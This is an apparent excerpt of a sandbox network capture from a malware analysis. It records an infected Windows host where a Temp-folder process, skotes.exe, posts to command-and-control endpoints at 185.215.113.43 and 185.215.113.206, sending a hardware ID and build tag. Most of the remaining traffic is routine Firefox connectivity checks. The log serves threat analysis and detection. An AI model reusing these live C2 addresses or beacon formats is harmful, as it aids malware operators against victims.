Dec 14, 2024 13:01:11.118671894 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 2d 2d 0d 0a Data Ascii: ------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="build"stok------DHIEHIIEHIEHJKEBKEHJ--
Dec 14, 2024 13:01:11.566205978 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 12:01:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50296	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:12.521738052 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:13.855139017 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	50303	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:13.575041056 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:14.660522938 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76981 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:14.713934898 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:15.099504948 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76981 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:15.141946077 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:15.457628965 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76982 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:15.921787977 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:16.236916065 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76983 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:17.332176924 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:17.647614956 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76984 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:18.615247965 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:18.934304953 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76985 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:21.600404024 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:21.915759087 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 76988 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:31.931013107 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:01:32.858484030 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:33.182434082 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77000 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:43.219990969 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:01:43.323688030 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:43.638988018 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77010 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:44.265158892 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:44.596541882 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77011 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:45.701266050 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:46.017932892 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77012 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:01:54.319139957 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:01:54.634294033 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77021 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:02:04.722606897 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:14.915390968 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:14.991071939 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:02:15.352154970 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77042 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:02:25.414810896 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:35.622833014 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:35.986120939 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:02:36.300606012 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77063 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:02:46.416204929 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:56.623569012 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:06.829555035 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:17.017410994 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:57.680980921 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:03:57.995634079 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77144 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 13:04:16.421515942 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 13:04:16.828881025 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:38:13 GMT Age: 77163 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	50314	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:14.784545898 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	50321	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:15.222811937 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	50322	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:15.586458921 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50323	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:15.608827114 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:16.950387001 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	50326	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:16.360284090 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:17.445995092 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77330 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:17.650237083 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:17.970392942 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77330 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:18.937058926 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:19.253858089 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77332 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:21.922009945 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:22.238068104 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77335 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:32.330288887 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:01:33.185436964 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:33.504030943 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77346 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
